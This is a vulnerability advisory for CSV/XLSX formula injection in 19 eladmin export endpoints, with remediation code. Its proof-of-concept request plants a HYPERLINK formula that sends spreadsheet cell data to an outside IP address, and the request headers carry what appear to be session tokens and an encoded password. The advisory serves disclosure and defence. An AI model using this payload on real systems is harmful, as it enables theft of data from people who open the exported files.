Description
CSV/XLSX Injection in 19 Endpoints of eladmin ≤ 2.7 (CWE-1236)
Summary
In eladmin versions up to 2.7, 19 endpoints are vulnerable to CSV/XLSX injection, which can lead to sensitive information disclosure when malicious spreadsheet formulas are executed.
Vulnerability Description
When exporting data to CSV or XLSX format, the application fails to sanitize special characters such as = and @. These characters are directly included in the exported file, allowing malicious spreadsheet formulas to be injected.
Example vulnerable code:
@ApiOperation("导出用户数据")
@GetMapping(value = "/download")
@PreAuthorize("@el.check('user:list')")
public void exportUser(HttpServletResponse response, UserQueryCriteria criteria) throws IOException {
    // Query results are written straight into the export; no cell-level sanitization is applied
    // to values such as the username before they reach the CSV/XLSX writer.
    userService.download(userService.queryAll(criteria), response);
}
Exploitation
Using /api/users/download as an example:
First, send a request to /api/users to register a username containing a malicious XLSX formula.
POST /api/users HTTP/1.1
Host: localhost:8013
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.9
Cookie: Admin-Token=d16b68d0baae48739ab4acdb03e9efd5; cc_cookie=%7B%22categories%22%3A%5B%22necessary%22%2C%22analytics%22%5D%2C%22revision%22%3A0%2C%22data%22%3Anull%2C%22consentTimestamp%22%3A%222025-08-09T11%3A02%3A33.095Z%22%2C%22consentId%22%3A%2236b540b5-c17a-4173-83a2-170ea77a1320%22%2C%22services%22%3A%7B%22necessary%22%3A%5B%5D%2C%22analytics%22%3A%5B%5D%7D%2C%22languageCode%22%3A%22en%22%2C%22lastConsentTimestamp%22%3A%222025-08-09T11%3A02%3A33.095Z%22%2C%22expirationTime%22%3A1770462153096%7D; username=admin; rememberMe=true; password=dm48PXaj4zProjs3wkI/Tq1hmptyDbbW2MA3g5yBmra6cZvYu4tXH8rc5iKWfAfBYOj5gl9wLh0TSheYE5aAow==; ELADMIN-TOEKN=Bearer%20eyJhbGciOiJIUzUxMiJ9.eyJqdGkiOiI5YjEzNDUyMTJmNDY0NDMxOTlkNTRkN2JhOGRjMmJlMiIsInVzZXIiOiJhZG1pbiIsInN1YiI6ImFkbWluIn0.QIRDcsKcS6Pg_gHx2kG8gPdgW4v6lA-O-9TSAp8jIt_nBb9cuamqmWG-WGpqPWcXsVpsqHD7kG7Gsi4jKilp4g
sec-ch-ua-platform: "Windows"
Referer: http://localhost:8013/system/user
sec-ch-ua-mobile: ?0
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate, br, zstd
Origin: http://localhost:8013
Sec-Fetch-Mode: cors
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJqdGkiOiI5YjEzNDUyMTJmNDY0NDMxOTlkNTRkN2JhOGRjMmJlMiIsInVzZXIiOiJhZG1pbiIsInN1YiI6ImFkbWluIn0.QIRDcsKcS6Pg_gHx2kG8gPdgW4v6lA-O-9TSAp8jIt_nBb9cuamqmWG-WGpqPWcXsVpsqHD7kG7Gsi4jKilp4g
Accept: application/json, text/plain, */*
Sec-Fetch-Dest: empty
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138"
Content-Length: 183
{"id":null,"username":"=HYPERLINK(\"http://123.57.23.40:1111/\"&A2&A3,\"test\")","nickName":"12345","gender":"男","email":"[email protected]","enabled":"false","roles":[{"id":1}],"jobs":[{"id":8}],"dept":{"id":7},"phone":18641372919}
Next, download the XLSX file via /api/users/download and open it in a spreadsheet application to observe the injected formula.
Clicking the malicious cell triggers the injection and results in exfiltration of data. In this case, the system username is disclosed.
Impacted Endpoints
This issue affects the following 19 routes:
Impact
- Execution of malicious spreadsheet formulas on the client machine
- Possible disclosure of sensitive information through external requests
- Potential for local code execution in certain spreadsheet applications with vulnerable configurations
Remediation
Perform strict sanitization on all fields before exporting to CSV/XLSX, ensuring special characters such as =, @, +, and - at the beginning of a cell are properly escaped or removed.
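One way to implement that remediation, as an added example that is not eladmin's own code: a hypothetical Java helper (class name ExportSanitizer is assumed) that forces text interpretation of any cell beginning with a formula trigger, including after leading whitespace, while leaving plain negative numbers untouched so numeric columns keep their type. It is meant to be applied to every string value before the export library writes it.

```java
import java.util.List;

/** Hypothetical helper (not eladmin code): neutralises cell values before CSV/XLSX export. */
public final class ExportSanitizer {
    // Characters that spreadsheet applications treat as the start of a formula,
    // plus tab and carriage return, which some applications use as cell separators.
    private static final String FORMULA_TRIGGERS = "=+-@\t\r";

    /**
     * Returns a value the spreadsheet will store as text rather than evaluate.
     * A leading single quote forces text interpretation. Leading whitespace is
     * stripped for the check only, because some applications trim it before parsing.
     * Plain numbers such as "-5" are returned unchanged so they stay numeric.
     */
    public static String sanitizeCell(String value) {
        if (value == null || value.isEmpty()) {
            return value;
        }
        String trimmed = value.stripLeading();
        if (trimmed.isEmpty() || trimmed.matches("-?\\d+(\\.\\d+)?")) {
            return value;
        }
        if (FORMULA_TRIGGERS.indexOf(trimmed.charAt(0)) >= 0) {
            return "'" + value;
        }
        return value;
    }

    /** For CSV output, additionally quote the field so embedded commas or quotes cannot split it. */
    public static String csvField(String value) {
        String safe = sanitizeCell(value);
        if (safe == null) {
            return "";
        }
        return "\"" + safe.replace("\"", "\"\"") + "\"";
    }

    public static void main(String[] args) {
        // Constructed sample values; the second mirrors the payload shape from the report above.
        List<String> samples = List.of(
            "admin",
            "=HYPERLINK(\"http://example.invalid/\"&A2&A3,\"test\")",
            "  @SUM(1+1)",
            "-5",
            "+1-800-555-0100");
        for (String s : samples) {
            System.out.println(s + "  ->  " + csvField(s));
        }
    }
}
```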